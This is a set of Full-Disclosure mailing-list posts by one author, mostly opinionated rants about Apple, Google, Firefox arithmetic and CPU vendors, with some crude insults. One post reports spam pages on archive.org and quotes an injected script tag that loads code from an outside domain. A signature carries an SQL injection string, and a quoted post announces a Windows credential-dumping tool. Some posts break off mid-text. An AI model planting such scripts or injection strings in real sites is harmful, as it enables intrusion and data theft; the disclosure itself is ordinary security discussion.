[Full-disclosure] Introducing libOnionRoute, the library to anonymize software

2013-05-06 Thread wac
Hi Everyone:

LibOnionRoute, the library to anonymize software was just released. It
is basically a modification of Tor to transform it into a library you
can link to your software. Some of us believe is more secure in some
situations to use it like that.

To find out more please visit:

http://onionroute.org

Regards
Waldo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] iPhone Geolocation storage

2011-05-14 Thread wac
Masochists exist!

On 5/13/11, Dan Tulovsky  wrote:
> Actually, the only thing boring here is your rant.
>
> On Wed, May 11, 2011 at 4:01 AM, wac  wrote:
>> So many ppl waste so much time in dead end technology. Amazing. I once
>> purchased a Mac and that's because it was old and extremely cheap.
>> Didn't even used it. Nothing worked there. It hanged, the harddrive
>> always got wrong bits in the bitmap after the hang. I wasted my money.
>> Apple users are nothing but low end inferior animals to Apple Inc. I
>> feel sorry about them. Honestly. Overpriced hardware tied to their
>> software, infected with bugs to the bones, with abusive rules about
>> the software they can run. And then they have to crack the very own
>> hardware they payed so much money for. Poor animals. Now we know they
>> are being tracked like cattle. And of course the decrepit argument
>> that because software is digitally signed it won't let run anything
>> malicious there. Hmmm that lie to an ignorant luser. Didn't the very
>> own Ionescu loaded a non signed driver with a broken ATI driver and
>> got his ass in Hollywood for doing that to windows. Hey the
>> playstation got those proxy discs to load pirated discs years before.
>> Are all applications in appstore bug free? :D Why they just doesn't
>> say that they want to control the software market and apply
>> monopolistic rules/rates? Too strong? Folks, just ignore them. They
>> are a Zero already. Is not even worth to jailbreak their bullshit.
>> That's exactly the game Apple Inc. want you to play. Use you like a
>> rabbit so hackers break the platform and software developers take the
>> bait. Same goes for users. They will think they have their amazing
>> free piece of crap to then get an iBrick, software developers banned
>> and hackers effort thrown in the trash can  with an update that takes
>> them seconds. And of course the press blah blah blah. Boring.
>>
>> On 5/4/11, Jeffrey Walton  wrote:
>>> iOS 4.3.3 is now available. From the two iPhone forensics
>>> books I have, trimming the location database (consolidated.db) is like
>>> sticking your thumb in a hole in a New Orleans levy. It ain't gonna
>>> help much.
>>>
>>> Jeff
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] iPhone Geolocation storage

2011-05-11 Thread wac
So many ppl waste so much time in dead end technology. Amazing. I once
purchased a Mac and that's because it was old and extremely cheap.
Didn't even used it. Nothing worked there. It hanged, the harddrive
always got wrong bits in the bitmap after the hang. I wasted my money.
Apple users are nothing but low end inferior animals to Apple Inc. I
feel sorry about them. Honestly. Overpriced hardware tied to their
software, infected with bugs to the bones, with abusive rules about
the software they can run. And then they have to crack the very own
hardware they payed so much money for. Poor animals. Now we know they
are being tracked like cattle. And of course the decrepit argument
that because software is digitally signed it won't let run anything
malicious there. Hmmm that lie to an ignorant luser. Didn't the very
own Ionescu loaded a non signed driver with a broken ATI driver and
got his ass in Hollywood for doing that to windows. Hey the
playstation got those proxy discs to load pirated discs years before.
Are all applications in appstore bug free? :D Why they just doesn't
say that they want to control the software market and apply
monopolistic rules/rates? Too strong? Folks, just ignore them. They
are a Zero already. Is not even worth to jailbreak their bullshit.
That's exactly the game Apple Inc. want you to play. Use you like a
rabbit so hackers break the platform and software developers take the
bait. Same goes for users. They will think they have their amazing
free piece of crap to then get an iBrick, software developers banned
and hackers effort thrown in the trash can  with an update that takes
them seconds. And of course the press blah blah blah. Boring.

On 5/4/11, Jeffrey Walton  wrote:
> iOS 4.3.3 is now available. From the two iPhone forensics
> books I have, trimming the location database (consolidated.db) is like
> sticking your thumb in a hole in a New Orleans levy. It ain't gonna
> help much.
>
> Jeff
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] sourceforge entry point seems still active.

2011-01-30 Thread wac
So it actually happened! Not surprising at all. I suspected at first
sight about a phish attempt because the email in another domain they
sent for contact in case of problems with password reset (didn't
bothered about headers anyway).

Seems mine was not compromised according to what they say "Our
analysis uncovered (among other things) a hacked SSH daemon, which was
modified to do password capture."

If i were them I would reinstall from scratch at least all SSH
servers. They all could be compromised!

On 1/30/11, exploit dev  wrote:
> Sourceforge has reported a full report of attack. Seems very close to what I
> wrote in previous messages and reported in my blog posts related to this
> thread.
>
> Sourceforge Attack: Full Report
> http://sourceforge.net/blog/sourceforge-attack-full-report/
>
> On Tue, Jan 25, 2011 at 9:18 PM, exploit dev  wrote:
>
>> Hi Andrew,
>>
>> just a reminder: this breach was used by php/python/perl script for get
>> and
>> save on user directory bot and remote shell. Also you could, as reported
>> also in owned and exposed zine, launch commands and attempt privilege
>> escalation. So I'm not so sure that this is not so writable as well i
>> think
>> is not right sayd that is not   critical.
>>
>> Regards-.
>>
>>
>> On Tue, Jan 25, 2011 at 8:47 PM, Andrew Farmer  wrote:
>>
>>> On 2011-01-24, at 12:08, exploit dev wrote:
>>> > Anyway, I'm sorry repeat my message. I think that this issue is a bit
>>> > critical but I don't receive still any feedback,
>>>
>>> It's not particularly critical by any means. SourceForge projects all
>>> have
>>> their own web space, and there are doubtless a bunch of them running
>>> vulnerable versions of software. These sites are relatively isolated, and
>>> don't have write access to the project's SCM or downloads.
>>
>>
>>
>>
>> --
>> http://extraexploit.blogspot.com
>>
>
>
>
> --
> http://extraexploit.blogspot.com
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Making Security Suck Less

2010-12-23 Thread wac
Aha, welcome to the world. It is broken and will likely keep that way
for long. So do what i do... Adapt, take a seat, wear a green hat if
you can and forget about the rest. They will not understand, nor they
want to. Besides we would see a load of net admins loosing their jobs
/ companies filling bankruptcy if the model changes so...

You know what.. Bertrand Russell said once:

"Men who are unhappy, like men who sleep badly, are always proud of the fact."

Sort like the old way of saying "don't worry be happy!" :D

And I have serious doubts about that OSSTMM btw.



On 12/16/10, Pete Herzog  wrote:
> Hi,
>
> "Now not everything about the old security model is bad. Personally, I
> really like the Zen feel of it. It's like raking the fine, white,
> beach sand into those concentric lines and around rocks and dead fish
> and stuff. It's very Zen. Then as the tide rises, the wind blows, and
> Frisbees get badly thrown you have to do it all over again in a very
> Zen way like this: Install. Harden. Configure. Patch. Scan. Patch
> again. Update. Re-configure. Scan. Patch again. Uninstall. Re-install.
> Configure. And then you do it all over again! With so much Zen
> practice it's hard not to become a Master of the security repeat
> cycle. But you know what else is Zen? NOT doing that. It's less
> stressful to maintain an existing balance between operations,
> limitations, and controls then running around and putting out fires."
>
> This is from my new article called, "Making Security Suck Less" you
> can read finished at:
>
> https://www.infosecisland.com/blogview/10304-Making-Security-Suck-Less.html
>
> There's some more, new articles reviewing the OSSTMM and the new
> security model at InfoSec Island here:
>
> https://www.infosecisland.com/osstmm.html
>
> Sincerely,
> -pete.
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
> www.isecom.org - www.osstmm.org
> www.hackerhighschool.org - www.badpeopleproject.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google Maps XSS (currently unpatched)

2010-02-03 Thread wac
> First of all, "security" is a myth. One can presume they're "secure"
(or secluded) from danger sitting behind a firewall, but to do so is
just foolish.

Something is better than nothing ;).

> People in power love to say "if you have nothing to hide then nothing to
worry about" when it comes to tracking, keeping data, searching data etc
etc 1984 et al...but this is wrong. I'm not doing anything wrong in my
eyes, but that may mean topperling the over bearing government that
wants us all chipped, so my privacy is worth a lot. Once it's too late,
it will be very difficult to get privacy back.

Yet worse than being chipped is that somebody is looking forward to harm
you. Even if they don't know you and even if also you don't know them. Never
forget about that.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs

2010-02-03 Thread wac
In any case i wonder how much google is going to respect corporate, industry
secret or all that stuff you don't want them to know with google wave. Best
thing to do is not to use that. I really doubt that it is an improvement and
i think i will hardly ever need it. Is just more fanboi food. (knowing gmail
how i know it and left for public stuff only how i left it)

On Thu, Jan 21, 2010 at 5:28 AM, dramacrat  wrote:

> inb4 front page news
>
> 2010/1/21 
>
> > Well, that's exactly what I'm saying.  Pretending that this is some kind
>> new
>> > exploit class simply because Google Wave is used is stupid.  This is the
>> > logical extension of e-mail and instant message and social network
>> attacks
>> > to the next potential platform.
>>
>> Following in the history of the security community, we should coin a
>> buzzword on this old issue with a new spin.
>> WaveJacking sounds like a perfect fit.
>> 
>>
>>
>> > On Tue, Jan 19, 2010 at 8:10 PM,  wrote:
>> >
>> > > On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik said:
>> > > > Yeah, no kidding.  Surprise! Untrusted files can be malicious.  If
>> you
>> > > > accept files from those whom you do not trust, whether its via
>> e-mail,
>> > > > instant message, Google Wave, or physical media, you well and truly
>> > > deserve
>> > > > the virus that'll eventually infect your machine.
>> > >
>> > > Let's see.. *HOW* many years ago did we first see e-mail based viruses
>> that
>> > > depended on people opening them because they came from people they
>> already
>> > > knew?  'CHRISTMA EXEC' in 1984 comes to mind.
>> > >
>> > > The problem here is that Google Wave is for *collaboration* - which
>> means
>> > > that you're communicating with people you already know, and presumably
>> > > trust to some degree or other. "Hey Joe, look at this PDF and tell me
>> > > what you think" is something reasonable when the request comes from
>> > > somebody
>> > > who Joe knows and who has sent Joe PDF's in the past.
>> > >
>> > > I guarantee that if every time you receive a document that appears to
>> be
>> > > from
>> > > your boss, you call back and ask if they really intended to send a
>> document
>> > > or
>> > > if it's a virus, your boss will get very cranky with you very fast.
>> > >
>> > > Let's look at that original advisory again:
>> > >
>> > > >> An attacker could upload his malware to a wave and share it to his
>> > > >> Google Wave contacts.
>> > >
>> > > Now change that to "An attacker could trick/pwn some poor victim into
>> > > uploading
>> > > the malware to a wave"  Hilarity ensues.
>> > >
>> > >
>> > >
>> > >
>> >
>> > --000e0cd2e002580025047da0b22e
>> > Content-Type: text/html; charset=ISO-8859-1
>> > Content-Transfer-Encoding: quoted-printable
>> >
>> > Well, that's exactly what I'm saying.=A0 Pretending that this is
>> so=
>> > me kind new exploit class simply because Google Wave is used is
>> stupid.=A0 =
>> > This is the logical extension of e-mail and instant message and social
>> netw=
>> > ork attacks to the next potential platform.
>> > -- Rohit PatnaikOn Tue, Jan 19,
>> 2010=
>> >  at 8:10 PM,  <> valdis.kletni...@vt.e=
>> > du">valdis.kletni...@vt.edu> wrote:> class=3D"g=
>> > mail_quote" style=3D"border-left: 1px solid rgb(204, 204, 204); margin:
>> 0pt=
>> >  0pt 0pt 0.8ex; padding-left: 1ex;">
>> > On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik
>> said:
>> > > Yeah, no kidding. =A0Surprise! Untrusted files can be malicious.
>> =A0If=
>> >  you
>> > > accept files from those whom you do not trust, whether its via
>> e-mail,=
>> > 
>> > > instant message, Google Wave, or physical media, you well and truly
>> de=
>> > serve
>> > > the virus that'll eventually infect your machine.
>> > 
>> > Let's see.. *HOW* many years ago did we first see e-mail based
>> vi=
>> > ruses that
>> > depended on people opening them because they came from people they
>> already<=
>> > br>
>> > knew? =A0'CHRISTMA EXEC' in 1984 comes to mind.
>> > 
>> > The problem here is that Google Wave is for *collaboration* - which
>> means> > r>
>> > that you're communicating with people you already know, and
>> presumably<=
>> > br>
>> > trust to some degree or other. "Hey Joe, look at this PDF and tell
>> me<=
>> > br>
>> > what you think" is something reasonable when the request comes from
>> so=
>> > mebody
>> > who Joe knows and who has sent Joe PDF's in the past.
>> > 
>> > I guarantee that if every time you receive a document that appears to be
>> fr=
>> > om
>> > your boss, you call back and ask if they really intended to send a
>> document=
>> >  or
>> > if it's a virus, your boss will get very cranky with you very
>> fast.
>> > 
>> > Let's look at that original advisory again:
>> > 
>> > >> An attacker could upload his malware to a wave and share it to
>> his=
>> > 
>> > >> Google Wave contacts.
>> > 
>> > Now change that to "An attacker could trick/pwn some poor
>> victim=
>> >  into uploading
>> > the malware to a wave" =A0Hilarity ensues.
>> > 
>> > 
>> > 
>> > 
>> 

Re: [Full-disclosure] What the UK government care about in a hacker

2008-06-26 Thread wac
>How will the UK government contact you? Brute guys will jump out of a
range rover land rover which will have darkened windows and will give
you an offer you can't refuse after abducting you for five minutes
based on your research post on Full-Disclosure.

Guys? Nope.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vacation reply

2008-05-12 Thread wac
No, is called google spaming full-d to get userbase for gmail. The more I
see it the more I want to drop it. Problem. They do user locking. Yeahh well
we might publish some working code to help their locked users be free :D.
Would you like it? I might finish that piece of code ;)

On Mon, May 12, 2008 at 9:44 AM, M. Shirk <[EMAIL PROTECTED]> wrote:

> Translation:
>
> Dear friends,
>
> Please send your messages to my new account: [EMAIL PROTECTED]
>
> This account of the revised hotmail not very often.
> ---
>
> WTF, ANY automated message to a public mailing list is grounds for Dying
> in a FIRE!!!
>
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
>
> (just trying to guarantee you get the most pen!s enlargement and pr0n
> emails as possible)
>
> Shirkdog
> ' or 1=1--
> http://www.shirkdog.us
>
>  --
> To: full-disclosure@lists.grok.org.uk
> Date: Thu, 8 May 2008 23:42:46 -0700
> From: [EMAIL PROTECTED]
> Subject: [Full-disclosure] Vacation reply
>
>
> Estimados amigos,
>
> Por favor envíenme sus mensajes a mi nueva cuenta: [EMAIL PROTECTED]
>
> Ésta cuenta de hotmail no la revisaré muy seguido.
>
> Saludos.
> Federico.-
>
>
> --
> Stay in touch when you're away with Windows Live Messenger. IM anytime
> you're 
> online.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tool release: extract Windows credentials from registry hives

2008-02-22 Thread wac
"Two Things Infinite: The Universe and Human Stupidity"
Albert Einstein

Google
Error


Forbidden
Your client does not have permission to get URL
/files/creddump-0.1.tar.bz2 from this server. (Client IP address:
xxx.xxx.xxx.xxx)

You are accessing this page from a forbidden country.


Why google code? Don't waste your time or others that want to download
and use SourceForge, Codeplex, FSF, etc. and make them loose revenue.
Is so laughable that even the license permits redistribution in the
first place and mirroring it won't be a crime. And then proxies /
bouncers / tunnels. But then why make you or your visitors loose time?
Or... maybe Google want us to make mirrors without  limitations of
it's entire website and make us get the revenue they won't ;). Let us
know google we are impatient to clone your SF takeover attempt sh...
without restrictions.


On 2/20/08, Brendan Dolan-Gavitt <[EMAIL PROTECTED]> wrote:
> CredDump is a new tool implemented entirely in Python that is capable
> of extracting:
>
> * LM and NT hashes (SYSKEY protected)
> * Cached domain passwords
> * LSA secrets
>
> It has no dependencies on any part of Windows, and operates directly
> on registry hive files. It is licensed under the GPL and intended to
> be easy to read, so you can find out how various Windows obfuscation
> algorithms work by reading the code. (I will also be posting a series
> of articles explaining the algorithms in detail on my blog in the
> coming weeks).
>
> You can download the tool at:
> http://code.google.com/p/creddump/
>
> Or read a more detailed introduction at:
> http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html
>
> CredDump is based on the hard work of many people, so please to read
> the credits section in the README.
>
> Cheers,
> Brendan
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-10-01 Thread wac
>
> If I use strcpy() to read user input into a buffer, I am at fault and
> not C compiler.


 I don't think that's a fair comparison.
If you make the right algorithm and you do not get the expected
results *is* not
your fault but what are you sitting at (compiler, framework, library ...).
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-10-01 Thread wac
Hello:

On 9/29/07, Andrew Farmer <[EMAIL PROTECTED] > wrote:
>
>
> If your bank is doing financial calculations using Javascript in a
> standard web browser, you have bigger things to worry about than
> roundoff errors.


 Ok let's explain this with more details because I realize that you got
something else (and might be the case of others). I was not refering to
banks performing all of the calculations on the
browser. That would be insane because users would be manipulating that for
sure changing a couple of web pages. A bank would not last a single day on
the internet in such case. I was commenting you about some calculations done
in your browser so you don't have to make them in your head, your operating
system calculator or a pocket calculator. Taxes and other kind of financial
calculations for example. Hey I could add a financial calculator on one
side of a page so you don't have to pick one. I don't
know wich calculus you could do I'm not a banker (not yet. I tell you by
then). The browser can do that kind of things better than
you. I don't know an exact
example but it could be the case. Remeber there are a zillion websites
out there. All
the bank needs to be sure is that all of the movements you do does not
exceeds your balance. If you (or your browser) intentionally or not performs
the calculation
wrong... Well... that is your problem. You won't steal money with that to
the bank. And that kind of things are very likely to be putted into the
browser more and more with AJAX, SilverLight and all of them just to prevent
mistakes in the first place. Is the trend. So a rounding
bug in javascript (in such case) could be really serious.

 Also notice
that if there is really a problem in FF javascript engine it goes
beyond the browser. You
could run Tamarin, Spidermonkey or Rhino on the server side and perform some
processing there with javascript.

http://developer.mozilla.org/en/docs/About_JavaScript

"Another common application for JavaScript is as a (web) server side
scripting language. A JavaScript web server would expose host objects
representing a HTTP request and response objects, which could then be
manipulated by a JavaScript program to dynamically generate web pages."


I based my previous comments on comments from some other persons but not on
my tests. I tried this code and is giving me the same result (
5.1005) in IE 6, FF 2.0.0.7 and Opera  9.23:



a=5.2;
b=0.1;
alert(a-b);



This one is giving me the same numbers too in every browser:


arrf



 So seems to me that IE is actually performing those
calculations with higher precision only when used as a calculator (directly
in the address box) but not in javascript code
(fortunately). However let me know if you find something. I'm interested and
would like to be aware of it.

 As a side comment I wanted to tell you that what is out
there on the internet is not a standart. Is what IE dictates. IE rules the
internet whether you like or not. It comes from a big one and also comes
preinstalled. That's why it holds a big share of the market. It imperates
and has a lot of pressure on the content published on the
internet. As IE adapts to the web, the web also adapts to IE.

As another side comment about the FP math. Well don't worry I already did
that some time
ago. While I'm not the expert in numeric math that was the first part
of the first
course of numeric math on my
second year. As a curiority and also a very usual mistake is that in
FP math a +
b + c is not always equal to a + c +
b. You must sort the numbers before doing that and do the calculus from
lower to higher if you want the most accurate
results. Yes FP math is tricky sometimes and a lot of care must be taken
with it since is not real math but approximations. For example sometimes you
need to make transformations to equations or use Taylor.
It might look boring at first sight but when you look closer you
realize that is very important
and catches your eye.

Regards
Waldo Alvarez
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-09-29 Thread wac
Hello:

On 9/28/07, Jimby Sharp <[EMAIL PROTECTED]> wrote:
>
> How is this serious and is it related to security in any manner? If
> not, please do not spam. :-(


 Many bugs are security related (I would say all). How it is security
related? Think. What happens if your bank calculates something wrong and
puts the lower in your account and the higher in another account? Yes It
might be little but what about a little many
times? That could be done with javascript too. Then... you are not safe
anymore. Specially today with the invasion of AJAX. One of the browsers is
broken for sure (several?). They should do the same even in such small
things. Should at least be very carefully documented. However just
documenting it is only going to bring trouble since many programmers won't
be aware of that. They would not even be making mistakes in the code but
triggering somebodie's else errors. This kind of stuff happens many times.
For instance a couple of days ago I hitted a problem in wich both Opera and
Firefox behaved differently to IE (some parameters in the form where not
sent to the server). Was with a   instead of
 (or the other way around can't remember right
was the workaround).

 Yes, every bug is security related. A database that is out of synch. An
improperly rounded number. Remember why Arianne blowed up on the air because
of this? Remember the mars landrover locked because of a priority inversion
bug? Would you call it a security bug? I really doubt many of you would.
However millions were lost. Wasn't security related? Think. What about if
someday the computers that handle the nuclear plant nearby make a wrong
rouding and one of the parameters go out of rank? Computers handle that,
handle your car, all of your communications, your heart beat and even your
foot steps (heard about those smart Adidas with a chip?).

 What if an airplane computer miss one of the parameters? It *is* a security
bug even if it is not a stack/heap overflow, an integer overflow and all of
the rest you all know about. I consider if not all of the bugs, at least the
vast majority as security bugs. For your very own good start thinking that
way too. Because someday you could even die just because somebody's else
made a mistake in one of those control systems. Worst yet... because someone
thought that it wasn't a security bug and was not important to fix it.

Regards
Waldo Alvarez

PD: Now you have another way to verify (fingerprint) wich browser is used to
browse a website even with spoofed User-Agent headers if javascript is
turned on.

And go and learn some floating point maths.
>
> On 9/28/07, carl hardwick <[EMAIL PROTECTED]> wrote:
> > There's a flaw in Firefox 2.0.0.7 allows javascript to execute wrong
> > subtractions.
> >
> > PoC concept here:
> > javascript:5.2-0.1
> > (copy this code into address bar)
> >
> > Firefox 2.0.0.7 result: 5.1005 (WRONG!)
> > Internet Explorer 7 result: 5.1 (OK)
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] www.archive.org <--- XSS (and under attack)

2007-09-25 Thread wac
Hello:

I could take a while to investigate this more but I have no
time ATM (veeery busy) and the website is under attack. (should be a
matter to try that script on some form. Get a virtual pass for the library,
digg in the book publishing forms and report back)

Try this links:
http://www.archive.org/details/BuyPhentermineOnline_979
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery


Parts of the HTML follows to help spot the hole

...

 free
deliveryhttp://www.w3.org/1999/XSL/Format";
class="content" style="text-align:left;">http://rico05.com/counter/counter.js?id=950&key=buy+phentermine";>

...



/- counter.js (called directly) -/

var ref = escape(document.referrer);
document.write('\

Re: [Full-disclosure] Remote hole in OpenBSD 4.1

2007-08-06 Thread wac
Hello:

 Maybe if their microcode where open or at least not encrypted (was DES?) we
could disassemble it and see for ourselves. Right now it doesn't matters if
you can read the source code of your entire operating system + drivers +
apps or even your ROM. At the end "they got you" whatever you run there
linux, windows, BSD whatever just pick (ohh yes you only need to send
special "data" over the net and you could be running code even in ring -1 if
you have control of the microcode). I wish I could have an electron
microscope. Yes call me paranoid but this days you have to. Probably all of
their CPUs from Intel, AMD and many others have several flaws buried inside
them for years. Maybe exploitable by someone who by chance found one. That
is not a surprise given the facts that we all have seen several flaws in the
past to the point that they decided that the microcode should be updated.
Great feature btw they realized too late about that.

 Any company considering to make a Neutral CPU? Think about that, emulation
at full speed of several architectures PPC, SPARC, x86, x64 (maybe even
at the same time) reduced costs since the extra cost on microcode
development and no copy-you-are-mine infringement since that would be code
from somebody else. Many of us would be happy to pay for our freedom and by
the way trow away dynamic translators. That will sell like water. Think
about that. The next revolution ;) Yep maybe talking I'm loosing this
vision. Ok one out of the basket.

 And yes Intel has made a lot of sh.. in the past in order to harm other
competitors. They ended hurting users in the end. Remember the time you
could buy Intel AMD or Cyrix without changing your motherboard? Ahh now the
motherfuckers made you buy one or the other with their copycrap in the
sockets. I probably would have AMD by now (In my opinion they have proven to
offer better stuff in the long run maybe not high clocks but certainly
higher performance or lower costs or better per watt performance or great
features). Now there is VT and Pacifica, several versions of 3D now and SSE.
And thanks to M$ (yes thanks a lot) we got compatible 64 bits. Otherwise
they would be doing the same sh. Jaj maybe they end up copyrighting your
opcodes. At the end lots of millions are lost for their fucking battle
making things inoperative with each other. Programmers breaking their heads
because we have to work and learn double triple ... ad infinitum. Users
complaint because X soft is only compatible with 3D now/SSE or whatever
thing and then almost nobody uses that (MMX at most). There should be laws
that would prevent them from doing that kind of things that hurt everyone
(including them) in the long run and make the life of millions of persons
problematic just because they want to hold a share. That is not development.
Period.

 And about the deRaadt thing being paid by AMD. Yes well maybe you are right
maybe not. But then remember the "BP I watch too much Matrix Trilogy" crap
just before Intel releasing their "shinning" hard. That is a bad taste joke.
AMD is in fact safer than VT if combined with the proper hardware. Maybe in
practice is not implemented by vendors (there is where the real problem
would be) but then that is probably a first step to later move the Trusted
Platform completely inside the CPU. Now who started the war "I pay a tech
bitch" (sorry but that's what they are if they actually are paid for telling
us lies) on the flaws side? ding ding INTEL... Again?!?!

I'm not an x86 CPU historian but this is what I have seen so far (not in
chronological order) and it stinks

AMD makes 3Dnow  > Intel makes incompatible SSE

AMD starts to grab too much users on the low end market ---> Intel makes the
socket copyrighted (of course AMD answers with the same)

AMD 3DNow 2 ---> Intel SSE2 SSE3 SSE4

AMD makes 64 bits ---> Intel tries to make incompatible 64 bits and M$ says
that there won't be a windows for that and Intel gives up. I would have
preferred to give a final kick to CISC so actually didn't liked the AMD
version but hey at least we have compatible things.

AMD makes designs for up to 8 cores ---> Intel simply had to RUN
(fortunately they could not do anything else)

AMD makes Pacifica (Secure Virtual Machine) ---> Intel makes a low end
version they called VT that only has a turn me off bit (fortunately
something can be done about this) or... where is the SKINIT equivalent?

 Intel pays a tech bitch to distract buyers from buying "insecure" AMD chips
---> AMD pays a tech bitch to distract buyers from buying faulty/insecure
Intel chips. At least that's what looks like in both sides. Of course who
can proof that? Any of those "they are paying" claims could be true or not,
there is no real evidence. Fortunately we can verify both fault claims. For
the first one reading the docs, and for the other claims trying some POC
with a CPU that is not updated. However M$ released almost silent updates
for the microcode driver, that's some evidenc

Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

2007-07-27 Thread wac
le
- Take it (no modification this time).
- Give me the signature (you already have the public key from the
distributor).
- Ok take the signature.
Now you verify and you can install it without doubts (note that you never
needed an anti-whatever) yet.. --> you are safe

Scenario 1 is what we all usually do today when we download files from the
internet. But worse is what they tell you to do. Download only from safe
places (what is a safe place? a safe website?). Keep your antivirus up to
date etc etc. Yeahh your antivirus up to date. Until it is face to face with
a modified version of morphine or whatever protector around covering your
favorite worm.

Resuming something like this

http://releases.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/source/firefox-2.0.0.5-source.tar.bz2.asc


but for binaries not only sources. And the public key visible by everyone
over SSL. Today you first have to hunt for the key and the signature is only
provided for the source packages.

ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/KEY.


FTP = Anybody can modify that in transit.

Then you can read there:

Please realize that this file itself or the public key servers may be

compromised.  You are encouraged to validate the authenticity of these keys in
an out-of-band manner.

...

Mozilla developers: please ensure that your key is also available via the
PGP keyservers (such as
pgpkeys.mit.edu).


Then after digging in pgpkeys.mit.edu you can finally find it here


http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0E3606D9


All of that comes in clear text even if you try to use SSL for pgp.mit.edu.
Where is the security? Nowhere. The security of the world fits in a cup of
coffee. Period.

Now you could ask yourself: "Sure but why Firefox? That applies to all sort
of binaries around." Yes unfortunately it does. But then browsers are
sensitive software. But then FF is pretty popular (and growing) and should
serve as an example to others. Is open source so no problem about sharing it
at all since was made to be shared. That's why. Why not X company? Remember
they are too "superior" to even listen so I won't waste my time with them.
However I know some of them are already reading this and I hope that at
least they start to consider that.

it's not like we are passing you an executable... if you are concerned
> that it will be modified in transit, you could always visit
> httpS://xs-sniper.com.
>

Don't worry I have absolutely no intention to visit your website that takes
advantage of someone's else findings for you own advertising profit. I can
find better information about that in bugzilla. And next time save your S.
You are typing extra.

I'd think SSL would provide more than
> reasonable security around that concern.
>
> If you need more, you could send me your private PGP key and I could
> send the exploit to you directly. :)


Sure I can send you one of my *private* keys + public revocation certificate
(or an expired private key). But then why waste my time? Maybe If I send you
a public one you can try to play with Shor (I recommend you to first try to
understand emails or get a brain before you try that). Remember that you
need to buy a computer with 8195 qubits to run the Period finding routine.
You can't do that with your Pentium X. Try your local dealer !!

Pissed off? Yes I know that last part really stinks. With that I'm paying
you with the very same coin so you can see how it looks from the other side.
The point? Don't do to others what you don't like to get back. Try that
option next time!! Take it as a lesson. And grow buddy, you are still in the
part "I'm l33t and better than everyone" the part when you honestly look
like a... (a word that you won't properly interpret) . No offense this time.

Have a nice day
Waldo

Thanks,
>
> Nate
>
> On 7/25/07, wac < [EMAIL PROTECTED]> wrote:
> > Well I hope the next version won't open 45 internet explorers when I
> click
> > the mailto URLs. And that when you download something you don't have the
> > save button enabled by default (and with that delay to avoid return hits
>
> > security things) It should have enabled by default the cancel button.
> > Instead of everybody having to wait a century to get the save button
> > activated. Is so broken that way. Ahh and to prevent clicks the dialog
> > displayed somewhere away from the mouse pointer. Ahh and by default no
> > having enabled the open with when you download but the save as (somebody
> can
> > hit enter without noticing). Hey maybe configurable?
> >
> > And what about providing in the website some hash over SSL so you can
> verify
> > that is was not modified on the fly when you download? I mean encrypting
> > every download around is simply brain dead but a ha

